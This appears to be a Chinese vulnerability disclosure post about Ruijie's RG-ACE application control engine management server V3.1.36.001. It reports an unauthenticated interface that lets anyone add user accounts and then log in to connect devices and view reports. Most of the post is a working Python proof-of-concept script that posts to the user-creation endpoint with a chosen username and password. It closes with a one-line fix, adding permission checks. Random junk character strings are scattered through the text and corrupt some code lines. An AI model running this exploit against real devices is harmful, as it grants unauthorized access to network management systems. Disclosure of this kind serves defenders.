锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
( h2 Q) b- L2 x8 z- l" N

测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
/ u! y5 a. H# d( N) P4 A编译时间: 201104291730
1 @# R  ~- N& x2 K) ^4 E; r2 `

9 D: J1 @5 x, ~$ ]0 x& h漏洞证明：
  {( u' r6 x0 [, e$ t0 O. C
$ {# @/ m# K* R
& r- E1 ?5 x2 h) P
1 U5 c% L& D+ Y' K


( R9 Y8 }9 \2 w执行脚本
#! /usr/bin/env python
#coding=gbk
" p4 Q# U9 I8 j5 C4 X#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
" f5 b3 G% F$ [: qurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
* O2 D9 c* h5 |, }  Q+ I1 s. i% r9 Topener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
1 c/ k! I, M8 s("useractionname","addButtonValue"),
4 s7 A; f- Y" U6 |("useropermanager","userManager"),
("userName","t"), #######账号自己加
4 d/ g: Q) m8 y+ F$ x' c$ k: `("pwd","aaaaaa"),######密码自己加
) S0 Q, K% D/ ]/ [' p6 N# S/ T("trueName","ad"),
) D' J$ K' k  G" G2 C("email",""),
("mobilePhone",""),
("officePhone",""),
+ r- `0 g! i/ o/ z1 {3 y7 y("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
9 C8 Q  O% S* i( |. V6 N' \7 yp=urllib2.urlopen(url, urllib.urlencode(post)).read()
1 \1 L+ f8 d+ Z/ G$ _print "Done"

登录，连接设备
4 O9 E3 g+ R6 g0 ~( C/ L
0 {, T( @5 y3 _& [& V  U
, y# o6 Z9 n* w. {3 j7 Q
1 b& ?8 B7 F* R  G$ y) _1 W

7 B/ L2 S( i0 i& T  |0 Y8 y1 S6 O2 z默认的管理员admin权限更大点




! ~# d- l- m: }" f8 R# E! n
修复方案：
( ~9 n" z) q; e- A. x. _加强对接口的权限验证